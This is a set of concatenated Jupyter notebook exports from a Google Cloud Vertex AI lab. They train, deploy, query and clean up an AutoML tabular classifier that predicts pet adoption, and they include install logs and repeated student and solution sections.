INFO:google.cloud.aiplatform.datasets.dataset:Create TabularDataset backing LRO: projects/1075205415941/locations/us-central1/datasets/1945247175768276992/operations/1110822578768838656
INFO:google.cloud.aiplatform.datasets.dataset:TabularDataset created. Resource name: projects/1075205415941/locations/us-central1/datasets/1945247175768276992
INFO:google.cloud.aiplatform.datasets.dataset:To use this TabularDataset in another session:
INFO:google.cloud.aiplatform.datasets.dataset:ds = aiplatform.TabularDataset('projects/1075205415941/locations/us-central1/datasets/1945247175768276992')
###Markdown
Launch a Training Job to Create a ModelOnce you have defined the training job, you can run it to create a model. The `run` function creates a training pipeline that trains and creates a `Model` object. After the training pipeline completes, the `run` function returns the `Model` object.
###Code
job = aiplatform.AutoMLTabularTrainingJob(
display_name="train-petfinder-automl-1",
optimization_prediction_type="classification",
column_transformations=[
{"categorical": {"column_name": "Type"}},
{"numeric": {"column_name": "Age"}},
{"categorical": {"column_name": "Breed1"}},
{"categorical": {"column_name": "Color1"}},
{"categorical": {"column_name": "Color2"}},
{"categorical": {"column_name": "MaturitySize"}},
{"categorical": {"column_name": "FurLength"}},
{"categorical": {"column_name": "Vaccinated"}},
{"categorical": {"column_name": "Sterilized"}},
{"categorical": {"column_name": "Health"}},
{"numeric": {"column_name": "Fee"}},
{"numeric": {"column_name": "PhotoAmt"}},
],
)
# This will take around an hour to run
model = job.run(
dataset=ds,
target_column="Adopted",
training_fraction_split=0.8,
validation_fraction_split=0.1,
test_fraction_split=0.1,
model_display_name="adopted-prediction-model",
disable_early_stopping=False,
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:16: DeprecationWarning: consider using column_specs instead. column_transformations will be deprecated in the future.
app.launch_new_instance()
###Markdown
Deploy your modelBefore you use your model to make predictions, you need to deploy it to an `Endpoint`. You can do this by calling the `deploy` function on the `Model` resource. This function does two things:1. Creates an `Endpoint` resource to which the `Model` resource will be deployed.2. Deploys the `Model` resource to the `Endpoint` resource.Deploy your model. NOTE: Wait until the model **FINISHES** deployment before proceeding to prediction.
###Code
endpoint = model.deploy(
machine_type="n1-standard-4",
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Predict on the endpoint * This sample instance is taken from an observation in which `Adopted` = **Yes*** Note that the values are all strings. Since the original data was in CSV format, everything is treated as a string. The transformations you defined when creating your `AutoMLTabularTrainingJob` inform Vertex AI to transform the inputs to their defined types.
###Code
prediction = endpoint.predict(
[
{
"Type": "Cat",
"Age": "3",
"Breed1": "Tabby",
"Gender": "Male",
"Color1": "Black",
"Color2": "White",
"MaturitySize": "Small",
"FurLength": "Short",
"Vaccinated": "No",
"Sterilized": "No",
"Health": "Healthy",
"Fee": "100",
"PhotoAmt": "2",
}
]
)
print(prediction)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Undeploy the modelTo undeploy your `Model` resource from the serving `Endpoint` resource, use the endpoint's `undeploy` method with the following parameter:- `deployed_model_id`: The model deployment identifier returned by the prediction service when the `Model` resource is deployed. You can retrieve the `deployed_model_id` using the prediction object's `deployed_model_id` property.
###Code
endpoint.undeploy(deployed_model_id=prediction.deployed_model_id)
###Output
INFO:google.cloud.aiplatform.models:Undeploying Endpoint model: projects/1075205415941/locations/us-central1/endpoints/7467372802459303936
###Markdown
Cleaning upTo clean up all Google Cloud resources used in this project, you can [delete the Google Cloud project](https://cloud.google.com/resource-manager/docs/creating-managing-projects#shutting_down_projects) you used for the tutorial.Otherwise, you can delete the individual resources you created in this tutorial:- Training Job- Model- Endpoint- Cloud Storage Bucket**Note**: You must delete any `Model` resources deployed to the `Endpoint` resource before deleting the `Endpoint` resource.
###Code
delete_training_job = True
delete_model = True
delete_endpoint = True
# Warning: Setting this to true will delete everything in your bucket
delete_bucket = False
# Delete the training job
job.delete()
# Delete the model
model.delete()
# Delete the endpoint
endpoint.delete()
if delete_bucket and "BUCKET_NAME" in globals():
! gsutil -m rm -r $BUCKET_NAME
###Output
INFO:google.cloud.aiplatform.base:Deleting AutoMLTabularTrainingJob : projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Delete AutoMLTabularTrainingJob backing LRO: projects/1075205415941/locations/us-central1/operations/5317466105709592576
INFO:google.cloud.aiplatform.base:AutoMLTabularTrainingJob deleted. . Resource name: projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Deleting Model : projects/1075205415941/locations/us-central1/models/3676687718445744128
###Markdown
**Only if your bucket doesn't already exist**: Run the following cell to create your Cloud Storage bucket.
###Code
! gsutil mb -l $REGION $BUCKET_NAME
###Output
Creating gs://qwiklabs-gcp-04-c846b6079446aip-20210826051658/...
###Markdown
Finally, validate access to your Cloud Storage bucket by examining its contents:
###Code
! gsutil ls -al $BUCKET_NAME
###Output
_____no_output_____
###Markdown
Copy dataset into your Cloud Storage bucket
###Code
IMPORT_FILE = "petfinder-tabular-classification_toy.csv"
! gsutil cp gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/{IMPORT_FILE} {BUCKET_NAME}/data/
gcs_source = f"{BUCKET_NAME}/data/{IMPORT_FILE}"
###Output
Copying gs://cloud-training/mlongcp/v3.0_MLonGC/toy_data/petfinder-tabular-classification_toy.csv [Content-Type=text/csv]...
[1 files][378.2 KiB/378.2 KiB]
Operation completed over 1 objects/378.2 KiB.
###Markdown
Import Vertex SDK for PythonImport the Vertex SDK into your Python environment and initialize it.
###Code
# Import necessary libraries
import os
from google.cloud import aiplatform
aiplatform.init(project=PROJECT_ID, location=REGION)
###Output
_____no_output_____
###Markdown
TutorialNow you are ready to create your AutoML Tabular model. Create a Managed Tabular Dataset from a CSVThis section will create a dataset from a CSV file stored on your GCS bucket.
###Code
ds = dataset = aiplatform.TabularDataset.create(
display_name="petfinder-tabular-dataset",
gcs_source=gcs_source,
)
ds.resource_name
###Output
INFO:google.cloud.aiplatform.datasets.dataset:Creating TabularDataset
INFO:google.cloud.aiplatform.datasets.dataset:Create TabularDataset backing LRO: projects/1075205415941/locations/us-central1/datasets/1945247175768276992/operations/1110822578768838656
INFO:google.cloud.aiplatform.datasets.dataset:TabularDataset created. Resource name: projects/1075205415941/locations/us-central1/datasets/1945247175768276992
INFO:google.cloud.aiplatform.datasets.dataset:To use this TabularDataset in another session:
INFO:google.cloud.aiplatform.datasets.dataset:ds = aiplatform.TabularDataset('projects/1075205415941/locations/us-central1/datasets/1945247175768276992')
###Markdown
Launch a Training Job to Create a ModelOnce you have defined the training job, you can run it to create a model. The `run` function creates a training pipeline that trains and creates a `Model` object. After the training pipeline completes, the `run` function returns the `Model` object.
###Code
# TODO 1
# Constructs a AutoML Tabular Training Job
job = aiplatform.AutoMLTabularTrainingJob(
display_name="train-petfinder-automl-1",
optimization_prediction_type="classification",
column_transformations=[
{"categorical": {"column_name": "Type"}},
{"numeric": {"column_name": "Age"}},
{"categorical": {"column_name": "Breed1"}},
{"categorical": {"column_name": "Color1"}},
{"categorical": {"column_name": "Color2"}},
{"categorical": {"column_name": "MaturitySize"}},
{"categorical": {"column_name": "FurLength"}},
{"categorical": {"column_name": "Vaccinated"}},
{"categorical": {"column_name": "Sterilized"}},
{"categorical": {"column_name": "Health"}},
{"numeric": {"column_name": "Fee"}},
{"numeric": {"column_name": "PhotoAmt"}},
],
)
# TODO 2a
# Create and train the model object
# This will take around two and a half hours to run
model = job.run(
dataset=ds,
target_column="Adopted",
# TODO 2b
# Define training, validation and test fraction for training
training_fraction_split=0.8,
validation_fraction_split=0.1,
test_fraction_split=0.1,
model_display_name="adopted-prediction-model",
disable_early_stopping=False,
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
/opt/conda/lib/python3.7/site-packages/ipykernel_launcher.py:16: DeprecationWarning: consider using column_specs instead. column_transformations will be deprecated in the future.
app.launch_new_instance()
###Markdown
Deploy your modelBefore you use your model to make predictions, you need to deploy it to an `Endpoint`. You can do this by calling the `deploy` function on the `Model` resource. This function does two things:1. Creates an `Endpoint` resource to which the `Model` resource will be deployed.2. Deploys the `Model` resource to the `Endpoint` resource.Deploy your model. NOTE: Wait until the model **FINISHES** deployment before proceeding to prediction.
###Code
# TODO 3
# Deploy the model resource to the serving endpoint resource
endpoint = model.deploy(
machine_type="n1-standard-4",
)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Predict on the endpoint * This sample instance is taken from an observation in which `Adopted` = **Yes*** Note that the values are all strings. Since the original data was in CSV format, everything is treated as a string. The transformations you defined when creating your `AutoMLTabularTrainingJob` inform Vertex AI to transform the inputs to their defined types.
###Code
# TODO 4
# Make a prediction using the sample values
prediction = endpoint.predict(
[
{
"Type": "Cat",
"Age": "3",
"Breed1": "Tabby",
"Gender": "Male",
"Color1": "Black",
"Color2": "White",
"MaturitySize": "Small",
"FurLength": "Short",
"Vaccinated": "No",
"Sterilized": "No",
"Health": "Healthy",
"Fee": "100",
"PhotoAmt": "2",
}
]
)
print(prediction)
###Output
/opt/conda/lib/python3.7/site-packages/ipykernel/ipkernel.py:283: DeprecationWarning: `should_run_async` will not call `transform_cell` automatically in the future. Please pass the result to `transformed_cell` argument and any exception that happen during thetransform in `preprocessing_exc_tuple` in IPython 7.17 and above.
and should_run_async(code)
###Markdown
Undeploy the modelTo undeploy your `Model` resource from the serving `Endpoint` resource, use the endpoint's `undeploy` method with the following parameter:- `deployed_model_id`: The model deployment identifier returned by the prediction service when the `Model` resource is deployed. You can retrieve the `deployed_model_id` using the prediction object's `deployed_model_id` property.
###Code
# TODO 5
# Undeploy the model resource
endpoint.undeploy(deployed_model_id=prediction.deployed_model_id)
###Output
INFO:google.cloud.aiplatform.models:Undeploying Endpoint model: projects/1075205415941/locations/us-central1/endpoints/7467372802459303936
###Markdown
Cleaning upTo clean up all Google Cloud resources used in this project, you can [delete the Google Cloud project](https://cloud.google.com/resource-manager/docs/creating-managing-projects#shutting_down_projects) you used for the tutorial.Otherwise, you can delete the individual resources you created in this tutorial:- Training Job- Model- Endpoint- Cloud Storage Bucket**Note**: You must delete any `Model` resources deployed to the `Endpoint` resource before deleting the `Endpoint` resource.
###Code
delete_training_job = True
delete_model = True
delete_endpoint = True
# Warning: Setting this to true will delete everything in your bucket
delete_bucket = False
# Delete the training job
job.delete()
# Delete the model
model.delete()
# Delete the endpoint
endpoint.delete()
if delete_bucket and "BUCKET_NAME" in globals():
! gsutil -m rm -r $BUCKET_NAME
###Output
INFO:google.cloud.aiplatform.base:Deleting AutoMLTabularTrainingJob : projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Delete AutoMLTabularTrainingJob backing LRO: projects/1075205415941/locations/us-central1/operations/5317466105709592576
INFO:google.cloud.aiplatform.base:AutoMLTabularTrainingJob deleted. . Resource name: projects/1075205415941/locations/us-central1/trainingPipelines/1715908841423503360
INFO:google.cloud.aiplatform.base:Deleting Model : projects/1075205415941/locations/us-central1/models/3676687718445744128
###Markdown
Vertex AI Model Builder SDK: AutoML Tabular Training and Prediction OverviewIn this notebook, you learn how to use the Vertex AI Python client library to train and deploy a tabular classification model for online prediction. Learning ObjectiveIn this notebook, you learn how to:* Create a Vertex AI model training job.* Train an AutoML tabular model.* Deploy the `model` resource to a serving `endpoint` resource.* Make a prediction by sending data.* Undeploy the `model` resource. IntroductionIn this notebook, you will use Vertex AI Python client library to train and make predictions on an AutoML model based on a tabular dataset. Alternatively, you can train and make predictions on models by using the gcloud command-line tool or by using the online Cloud Console.Each learning objective will correspond to a __TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/automl-tabular-classification.ipynb). **Make sure to enable the Vertex AI API and Compute Engine API.** Installation
###Code
# Setup your dependencies
import os
# The Google Cloud Notebook product has specific requirements
IS_GOOGLE_CLOUD_NOTEBOOK = os.path.exists("/opt/deeplearning/metadata/env_version")
USER_FLAG = ""
# Google Cloud Notebook requires dependencies to be installed with '--user'
if IS_GOOGLE_CLOUD_NOTEBOOK:
USER_FLAG = "--user"
###Output
_____no_output_____
###Markdown
Install the latest version of the Vertex AI client library.Run the following command in your virtual environment to install the Vertex SDK for Python:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-aiplatform
###Output
Requirement already satisfied: google-cloud-aiplatform in /opt/conda/lib/python3.7/site-packages (1.1.1)
Collecting google-cloud-aiplatform
Downloading google_cloud_aiplatform-1.3.0-py2.py3-none-any.whl (1.3 MB)
[K |████████████████████████████████| 1.3 MB 7.6 MB/s eta 0:00:01
[?25hRequirement already satisfied: proto-plus>=1.10.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.19.0)
Requirement already satisfied: google-cloud-bigquery<3.0.0dev,>=1.15.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (2.23.2)
Requirement already satisfied: google-api-core[grpc]<3.0.0dev,>=1.26.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.31.1)
Requirement already satisfied: google-cloud-storage<2.0.0dev,>=1.32.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.41.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (21.0)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.53.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.1)
Requirement already satisfied: google-auth<2.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.34.0)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.25.1)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (49.6.0.post20210108)
Requirement already satisfied: grpcio<2.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.38.1)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.7.2)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.2.7)
Requirement already satisfied: google-resumable-media<3.0dev,>=0.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.3.2)
Requirement already satisfied: google-cloud-core<3.0.0dev,>=1.4.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=0.6.0->google-cloud-bigquery<3.0.0dev,>=1.15.0->google-cloud-aiplatform) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-cloud-aiplatform) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (0.4.8)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.5.30)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.26.6)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.0.0)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.10)
Installing collected packages: google-cloud-aiplatform
[33m WARNING: The script tb-gcp-uploader is installed in '/home/jupyter/.local/bin' which is not on PATH.
Consider adding this directory to PATH or, if you prefer to suppress this warning, use --no-warn-script-location.[0m
Successfully installed google-cloud-aiplatform-1.3.0
###Markdown
Install the Cloud Storage library:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-storage
###Output
Requirement already satisfied: google-cloud-storage in /opt/conda/lib/python3.7/site-packages (1.41.1)
Collecting google-cloud-storage
Downloading google_cloud_storage-1.42.0-py2.py3-none-any.whl (105 kB)
[K |████████████████████████████████| 105 kB 8.1 MB/s eta 0:00:01
[?25hRequirement already satisfied: google-resumable-media<3.0dev,>=1.3.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.3.2)
Requirement already satisfied: google-auth<3.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.34.0)
Requirement already satisfied: google-cloud-core<3.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.7.2)
Requirement already satisfied: google-api-core<3.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (1.31.1)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-storage) (2.25.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (21.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2021.1)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (1.53.0)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (49.6.0.post20210108)
Requirement already satisfied: cachetools<5.0,>=2.0.0 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.2.2)
Requirement already satisfied: pyasn1-modules>=0.2.1 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.2.7)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<3.0dev,>=1.25.0->google-cloud-storage) (4.7.2)
Requirement already satisfied: google-crc32c<2.0dev,>=1.0 in /opt/conda/lib/python3.7/site-packages (from google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.1.2)
Requirement already satisfied: cffi>=1.0.0 in /opt/conda/lib/python3.7/site-packages (from google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (1.14.6)
Requirement already satisfied: pycparser in /opt/conda/lib/python3.7/site-packages (from cffi>=1.0.0->google-crc32c<2.0dev,>=1.0->google-resumable-media<3.0dev,>=1.3.0->google-cloud-storage) (2.20)
Requirement already satisfied: pyparsing>=2.0.2 in /opt/conda/lib/python3.7/site-packages (from packaging>=14.3->google-api-core<3.0dev,>=1.29.0->google-cloud-storage) (2.4.7)
Requirement already satisfied: pyasn1<0.5.0,>=0.4.6 in /opt/conda/lib/python3.7/site-packages (from pyasn1-modules>=0.2.1->google-auth<3.0dev,>=1.25.0->google-cloud-storage) (0.4.8)
Requirement already satisfied: urllib3<1.27,>=1.21.1 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (1.26.6)
Requirement already satisfied: idna<3,>=2.5 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2.10)
Requirement already satisfied: certifi>=2017.4.17 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (2021.5.30)
Requirement already satisfied: chardet<5,>=3.0.2 in /opt/conda/lib/python3.7/site-packages (from requests<3.0.0dev,>=2.18.0->google-cloud-storage) (4.0.0)
Installing collected packages: google-cloud-storage
Successfully installed google-cloud-storage-1.42.0
###Markdown
Restart the kernelAfter you install the additional packages, you need to restart the notebook kernel so it can find the packages.
###Code
# Automatically restart kernel after installs
import os
if not os.getenv("IS_TESTING"):
# Automatically restart kernel after installs
import IPython
app = IPython.Application.instance()
app.kernel.do_shutdown(True)
###Output
_____no_output_____
###Markdown
Set your project ID**If you don't know your project ID**, you may be able to get your project ID using `gcloud`.
###Code
import os
PROJECT_ID = ""
# Get your Google Cloud project ID from gcloud
if not os.getenv("IS_TESTING"):
shell_output=!gcloud config list --format 'value(core.project)' 2>/dev/null
PROJECT_ID = shell_output[0]
print("Project ID: ", PROJECT_ID)
###Output
Project ID: qwiklabs-gcp-04-c846b6079446
###Markdown
Otherwise, set your project ID here.
###Code
if PROJECT_ID == "" or PROJECT_ID is None:
PROJECT_ID = "qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
###Output
_____no_output_____
###Markdown
TimestampIf you are in a live tutorial session, you might be using a shared test account or project. To avoid name collisions between users on resources created, you create a timestamp for each instance session, and append it onto the name of resources you create in this tutorial.
###Code
# Import necessary libraries
from datetime import datetime
# Use a timestamp to ensure unique resources
TIMESTAMP = datetime.now().strftime("%Y%m%d%H%M%S")
###Output
_____no_output_____
###Markdown
Create a Cloud Storage bucket**The following steps are required, regardless of your notebook environment.**This notebook demonstrates how to use Model Builder SDK to create an AutoML model based on a tabular dataset. You will need to provide a Cloud Storage bucket where the dataset will be stored.Set the name of your Cloud Storage bucket below. It must be unique across all of your Cloud Storage buckets.You may also change the `REGION` variable, which is used for operationsthroughout the rest of this notebook. Make sure to [choose a region where Vertex AI services areavailable](https://cloud.google.com/vertex-ai/docs/general/locations). You maynot use a Multi-Regional Storage bucket for training with Vertex AI.
###Code
BUCKET_NAME = "gs://qwiklabs-gcp-04-c846b6079446" # @param {type:"string"}
REGION = "us-central1" # @param {type:"string"}
if BUCKET_NAME == "" or BUCKET_NAME is None or BUCKET_NAME == "gs://qwiklabs-gcp-04-c846b6079446":
BUCKET_NAME = "gs://" + PROJECT_ID + "aip-" + TIMESTAMP
###Output
_____no_output_____
###Markdown
Vertex AI Model Builder SDK: AutoML Tabular Training and Prediction. Overview: In this notebook, you learn how to use the Vertex AI Python client library to train and deploy a tabular classification model for online prediction. Learning Objective: In this notebook, you learn how to: * Create a Vertex AI model training job. * Train an AutoML tabular model. * Deploy the `model` resource to a serving `endpoint` resource. * Make a prediction by sending data. * Undeploy the `model` resource. Introduction: In this notebook, you will use the Vertex AI Python client library to train and make predictions on an AutoML model based on a tabular dataset. Alternatively, you can train and make predictions on models by using the gcloud command-line tool or by using the online Cloud Console. Each learning objective will correspond to a __TODO__ in this student lab notebook -- try to complete this notebook first and then review the [solution notebook](../solutions/automl-tabular-classification.ipynb). **Make sure to enable the Vertex AI API and Compute Engine API.** Installation
###Code
# Setup your dependencies
import os
# The Google Cloud Notebook product has specific requirements
IS_GOOGLE_CLOUD_NOTEBOOK = os.path.exists("/opt/deeplearning/metadata/env_version")
USER_FLAG = ""
# Google Cloud Notebook requires dependencies to be installed with '--user'
if IS_GOOGLE_CLOUD_NOTEBOOK:
USER_FLAG = "--user"
###Output
_____no_output_____
###Markdown
Install the latest version of the Vertex AI client library. Run the following command in your virtual environment to install the Vertex SDK for Python:
###Code
# Upgrade the specified package to the newest available version
! pip install {USER_FLAG} --upgrade google-cloud-aiplatform
###Output
Requirement already satisfied: google-cloud-aiplatform in /opt/conda/lib/python3.7/site-packages (1.1.1)
Collecting google-cloud-aiplatform
Downloading google_cloud_aiplatform-1.3.0-py2.py3-none-any.whl (1.3 MB)
[K |████████████████████████████████| 1.3 MB 7.6 MB/s eta 0:00:01
[?25hRequirement already satisfied: proto-plus>=1.10.1 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.19.0)
Requirement already satisfied: google-cloud-bigquery<3.0.0dev,>=1.15.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (2.23.2)
Requirement already satisfied: google-api-core[grpc]<3.0.0dev,>=1.26.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.31.1)
Requirement already satisfied: google-cloud-storage<2.0.0dev,>=1.32.0 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (1.41.1)
Requirement already satisfied: packaging>=14.3 in /opt/conda/lib/python3.7/site-packages (from google-cloud-aiplatform) (21.0)
Requirement already satisfied: googleapis-common-protos<2.0dev,>=1.6.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.53.0)
Requirement already satisfied: protobuf>=3.12.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (3.16.0)
Requirement already satisfied: six>=1.13.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.16.0)
Requirement already satisfied: pytz in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2021.1)
Requirement already satisfied: google-auth<2.0dev,>=1.25.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.34.0)
Requirement already satisfied: requests<3.0.0dev,>=2.18.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (2.25.1)
Requirement already satisfied: setuptools>=40.3.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (49.6.0.post20210108)
Requirement already satisfied: grpcio<2.0dev,>=1.29.0 in /opt/conda/lib/python3.7/site-packages (from google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (1.38.1)
Requirement already satisfied: rsa<5,>=3.1.4 in /opt/conda/lib/python3.7/site-packages (from google-auth<2.0dev,>=1.25.0->google-api-core[grpc]<3.0.0dev,>=1.26.0->google-cloud-aiplatform) (4.7.2)
